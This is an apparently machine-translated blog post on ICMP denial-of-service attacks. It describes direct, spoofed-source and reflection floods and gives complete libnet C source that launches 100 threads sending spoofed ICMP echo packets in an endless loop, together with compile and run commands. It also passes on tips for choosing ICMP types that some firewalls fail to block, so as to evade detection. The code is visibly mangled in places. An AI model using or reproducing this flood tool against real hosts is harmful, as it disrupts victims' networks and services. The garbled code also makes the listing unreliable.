LIBNET-ICMP attack

The first task is to ask host A to send ICMP packets to Host B, and the source IP and destination IP to be the IP of B, so that B accepts its own ICMP response packet, such as:

Found that this is not enough to affect B, so you intend to use other servers, such as:

Later, I realized that I was actually doing an ICMP attack.

ICMP attacks are divided into three ways:

1, Direct flood

Disadvantage: need enough bandwidth, and easy to expose their own IP.

2. Flood of Forged IP

3. Reflection

That's the way I'm supposed to be.

Set the source IP as the victim IP and then send ICMP packets (usually echo requests) to multiple servers, which are spoofed by the packet, returning echo response (type=0) to the victim, causing the garbage to clog the victim's doorway ...
As can be seen, it is more than the above two methods of one-level path-a deceived host (called "Reflection Source"), so a reflection source is effective or inefficient, will affect the flood effect! (My two-way effect is very different)

Cite someone else's blog: Some firewalls (such as Skynet) can only intercept echo request (Ping) ICMP packets, for other ICMP messages blind eye, do not know other firewalls have this situation. So if you want to be aware of the enemy, please try to avoid the direct echo Flood, swap with type=0 echo answer or type=14 timestamp response is best, other types of ICMP messages have not been tested in detail, you can try Type=3, 4, 11 of special messages will have a greater effect.

Here is the source code:

Sendicmp.c

#include <pthread.h>#include<stdio.h>#include<sys/time.h>#include<string.h>#include<libnet.h>#defineThread_num 100/* The number of the threads*/pthread_t Thread[thread_num];intNumber=0, I;void*Mythread () {inti; libnet_t*l = NULL;/*libnet Handle*/libnet_ptag_t Protocol_tag;/*Protocol Tokens*/    Char*payload_liu_wen_tao = NULL;/*Load*/u_short payload_length=0;/*Load Length*/    Char*device ="Ech0";/*Network Device Interface*/    Char*destination_ip_str ="192.168.1.5";/*Destination IP address string*/    Char*source_ip_str ="192.168.1.7";/*Source IP Address string*/U_long source_ip=0;/*Source IP Address*/U_long destination_ip=0;/*Destination IP Address*/    CharErrbuf[libnet_errbuf_size];/*error Message*/    intPacket_length;/*The length of the packet sent*/L= Libnet_init (/*Initialize Libnet*/Libnet_raw4,/*libnet type, for raw socket IPV4 type*/device,/*Network Device Interface*/Errbuf/*error Message*/    ); Source_ip=LIBNET_NAME2ADDR4 (L, Source_ip_str, libnet_resolve); /*Convert the source IP address string into network byte order data*/destination_ip=LIBNET_NAME2ADDR4 (L, Destination_ip_str, libnet_resolve); /*Convert the destination IP address string into network byte order data*/Protocol_tag= Libnet_build_icmpv4_echo (/*constructing an ICMP echo packet*/Icmp_echo,/*type, at which time the echo request*/    0,/*code, which should be 0*/    0,/*The checksum, which is 0, is calculated automatically by the libnet handle*/    123,/*identifier, assigned to 123, fill in any value yourself*/    456,/*serial number, assigned to 245, fill in any value*/NULL,/*load, assignment is empty*/    0,/*the length of the payload, assigned a value of 0*/L,/*libnet handle, which should be obtained by the Libnet_init () function*/    0  /*The protocol block tag, which is assigned a value of 0, represents the construction of a new protocol block*/    ); Protocol_tag= Libnet_build_ipv4 (/*constructing IP protocol blocks*/Libnet_ipv4_h+ Libnet_icmpv4_echo_h + payload_length,/*length of IP protocol block*/    0,/*Quality of service, this value is assigned to 0*/    Ten,/*identifier, which is assigned to a value of ten*/    0,/*offset, which is assigned a value of 0*/     -,/*time to live, here is the value*/ipproto_icmp,/*upper-level protocol type, here is the ICMP protocol*/    0,/*checksum, where 0 means the checksum is computed by the libnet*/Source_ip,/*Source IP Address*/Destination_ip,/*Destination IP Address*/Payload_liu_wen_tao,/*Load*/Payload_length,/*the length of the load*/L,/*libnet Handle*/    0 /*protocol block tag, for 0 means constructs a new IP protocol block*/    );  while(1) {Packet_length= Libnet_write (l);/*sends a packet represented by the libnet handle L*/        //printf ("The length of the ICMP packet is%d\n", packet_length);        /*output sent packet information*/} Libnet_destroy (L); /*destroying Libnet*/}voidThread_create (void){        intTemp,i; memset (&thread,0,sizeof(thread)); /*Creating Threads*/     for(i=0; i<thread_num;i++)        if(temp = pthread_create (&thread[i],null,mythread,null))! =0) printf ("thread creation failed!\n"); //Else//printf ("thread%d was created \ n", i);}voidThread_wait (void){        /*wait for thread to end*/    inti;  for(i=0; i<thread_num;i++)        if(Thread[i]! =0) {pthread_join (thread[i],null); //printf ("thread%d has ended \ n", i+1);        }}intMain () {thread_create ();        Thread_wait (); return 0;}

Compiler method in Ubuntu14.04: Gcc-o sendicmp sendicmp.c-lnet-lpthread
Run: sudo./sendicmp

But the target machine receives the packet the maximum traffic can only reach 3mb/s about, and the target machine also did not have the very strong reaction, the effect is not ideal. In addition, the sender's packet rate is not high, expect the sender's CPU all to send packets, but the actual test CPU can only reach 30-40%. Don't know for a moment what better way to improve.

Another idea is that you write a server, used to crawl a sent ICMP packet, the contents of the package to fill the larger, and then sent to B, so that may b received the traffic will improve, but now will only grab the package (with Libcap grab the package of code in another article), do not know how to fill the data, Pending research.

LIBNET-ICMP attack